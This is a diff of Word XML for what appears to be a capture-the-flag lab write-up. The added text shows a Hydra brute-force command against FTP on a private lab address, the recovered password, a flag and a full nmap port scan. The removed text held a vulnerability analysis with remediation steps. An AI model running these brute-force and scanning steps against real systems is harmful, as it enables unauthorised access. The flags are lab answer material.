+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Screenshot 8 –</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Credential Brute Force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>Using discovered username and wordlist:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="EE0000"/>
+        </w:rPr>
+        <w:t>hydra -l shadowops -P word.dir ftp://192.168.5.183</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>Valid credentials found:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Username:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>Admin Dashboard with Final Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t>shadowops</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Password:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+        </w:rPr>
+        <w:t>Ti@gO</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B964775" wp14:editId="7C74B2B2">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC60622" wp14:editId="01C1462C">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="1205480227" name="Picture 37"/>
+            <wp:docPr id="1425796738" name="Picture 38"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6238,7 +5752,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1205480227" name="Picture 1205480227"/>
+                    <pic:cNvPr id="1425796738" name="Picture 1425796738"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6269,528 +5783,153 @@
         </w:drawing>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Vulnerability Analysis</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t>User Flag Retrieval</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Logged in via FTP using discovered credentials.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Vulnerability Type</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:rPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+        <w:t>Downloaded:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>user.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-        <w:t>OWASP Top 10 – A02: Security Misconfiguration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
         </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Issues Identified</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• Publicly accessible .env file</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• Exposed backup directory</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• Hardcoded credentials in HTML comments</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• Sensitive data exposed in production</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Impact</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">• </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Credential disclosure</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• Database compromise</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• Privilege escalation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>• Full administrative takeover</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>In real-world applications, this could lead to:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• Data breach</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• System compromise</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>• Reputation damage</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Remediation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Block access to sensitive files via web server configuration</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Store .env files outside web root</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Remove backup files from public directories</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Remove debug information before deployment</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Conduct configuration audits before production</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Attack Flow Summary</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Performed Nmap scan → Identified open services</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Used Gobuster → Found hidden endpoints</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Accessed .env → Retrieved Flag 1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Accessed backups → Retrieved Flag 2</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Inspected source code → Found admin credentials</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="27"/>
-        </w:numPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Logged in as admin → Retrieved Final Flag</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-        </w:rPr>
-        <w:t>Final Flags Collected</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>ThunderCipher{Env_file_exposure_leads_to_sensitive_data_disclosure}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>ThunderCipher{Backup_file_exposure_leaks_sensitive_information}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-        <w:t>ThunderCipher{Admin_access_granted_with_leaked_password}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+        <w:t>Flag obtained:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>ThunderCipher{ftp_to_ssh_owned_0x8917}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
           <w:noProof/>
-          <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C13643" wp14:editId="438D4DE2">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4EF663" wp14:editId="65C99761">
             <wp:extent cx="5731510" cy="2820670"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
-            <wp:docPr id="534474996" name="Picture 38"/>
+            <wp:docPr id="1037276391" name="Picture 39"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6798,7 +5937,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="534474996" name="Picture 534474996"/>
+                    <pic:cNvPr id="1037276391" name="Picture 1037276391"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6829,6 +5968,2165 @@
         </w:drawing>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Hidden Service Discovery</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>Performed full port scan:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>nmap -p- 192.168.5.183</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="PlainText"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
